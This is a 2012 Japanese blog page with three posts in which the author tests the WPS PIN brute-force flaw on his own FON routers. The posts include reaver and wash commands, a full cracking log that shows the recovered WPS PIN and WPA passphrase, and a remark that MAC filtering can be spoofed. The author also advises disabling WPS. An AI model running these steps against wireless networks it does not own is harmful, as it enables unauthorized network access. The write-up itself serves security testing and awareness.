So-net無料ブログ作成
検索選択
人気ブログランキングへ

前の3件 | -

【WPS の脆弱性,reaver-wps,WPS が有効な AP の探索】 [reaver-wps]

reaver-wps の中に,WPS 有効な AP を探索するツール wash がある。

wash –i mon0 –C

近隣の AP が多数探索されたが,本当だろうか?
自分の AP は正しく探索できている。

reaver8

OS: BackTrack 5 R1  無線アダプタ: ra73usb

FON2405E の WPS
http://royalwin.blog.so-net.ne.jp/2012-01-30


タグ:WPS 脆弱性 reaver-wps FON2405E WPA クラック
2012-02-01 00:01  nice!(1)  コメント(0)  トラックバック(0) 

【WPS の脆弱性 - 新品の FON2405E 】 reaver-wps [reaver-wps]

P1070028
新品未使用の FON2405E で,reaver-wps による WPS ブルートフォース攻撃が成功した。
OS: BackTrack 5 R1 ,無線アダプタ: ra73usb

[+] Trying pin 63742442
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 38027 seconds
[+] WPS PIN: '63742442'
[+] WPA PSK: 'eimiezeeye'
[+] AP SSID: 'MyPlace'
root@bt:~#

所要時間は 11 時間。パソコンの性能がやや低いためか,公称の 4–10 時間よりも少々時間を要している。

FON2405E は プッシュボタン方式による WPS 簡単接続をサポートしているが,PIN 方式の脆弱性で,攻撃が可能であることが分かった。

FON の設定画面には,WPS を無効にするメニューは見当たらない。
reaver51
FON2405E は,MyPlace というプライベート用のネットワークがデフォルトで有効になっている。
WPA2-PSK で,強固なセキュリティになっているが,FON の電波が届くところにパソコンを置いて,10時間程度 reaver-wps を走らせればパスフレーズが判明してしまう。
パスフレーズの文字数や文字種を増やしても,この攻撃に対しては,意味がない。 
異なる PIN コードを何度も送信してきたら,ロックするなど,ファームウェアの強化が必要だが,FON2405E の設定画面にはファームウェア更新メニューが無い。
また前述のとおり,WPS を無効にするメニューも無い。

セキュリティが心配な人は,折角 softbank からもらった FON でも使わない方がいいかもしれない。

  • FON2305E も同様。
  • かなり大変だが,ファームウェアを書き換える方法はある。-> こちら
  • MACアドレスフィルタリングも偽装で回避できる。

reaver-wps


タグ:reaver-wps 脆弱性 WPS fon FON2405E
2012-01-30 23:03  nice!(2)  コメント(0)  トラックバック(0) 

【WPS の脆弱性に,ブルートフォース攻撃】 reaver-wps [reaver-wps]

無線LANセットアップを容易にする WPS の脆弱性が12月末に報告されていたが,1月早々に,ペンテストツールが公開されている。
reaver と wpscrack.py があるが,wpscrack.py の方が少し早いそうだ。
ブルートフォース攻撃なので,4 – 10 時間掛かる。

BackTrack 5 R1で,無線アダプタは ra73usb,攻撃ツールに reaver を使用した。 
AP は FON2305E(改造ファーム:Ralink APSoC SDK)を使用した。

FON の WPS 設定は,WPA2-PSK AES 。
wpssetup

無線アダプタをモニターモードにして,reaver を実行した。

airmon-ng wlan0 start
reaver –i mon0 –b [APのBSSID] -vv

reaver1

ブルートフォース(総当たり)なので何時間も掛かるが,最終的にWPA PSK のクラックが成功した。
reaver2

PIN は8 桁の数字だが,先頭4桁はAP が返す EAP-NACK で,容易に判明するそうだ。残り 4 桁の最終桁はチェックサムなので,10^4+10^3=11,000 回で判明する。

Windows 7 では標準で,プッシュボタン方式の AP 接続と,PIN 方式による AP の設定をサポートしている。
PIN 方式での無線 AP 接続は,標準ではサポートしていないので,無線アダプタメーカーのユーティリティ等で行う。

WPS の脆弱性問題を回避するには,WPS を Off にするか,ファームのアップデートが必要だ。 かなり危険な状況なので,WPS を「無効」に設定した方がいい。

以下のサイトに問題 AP の情報がある。
http://www.kb.cert.org/vuls/id/723755
Google ドキュメント WPS Vulnerability Testing

 


タグ:WPS reaver-wps 脆弱性 クラック
2012-01-29 12:59  nice!(2)  コメント(0)  トラックバック(0) 
前の3件 | -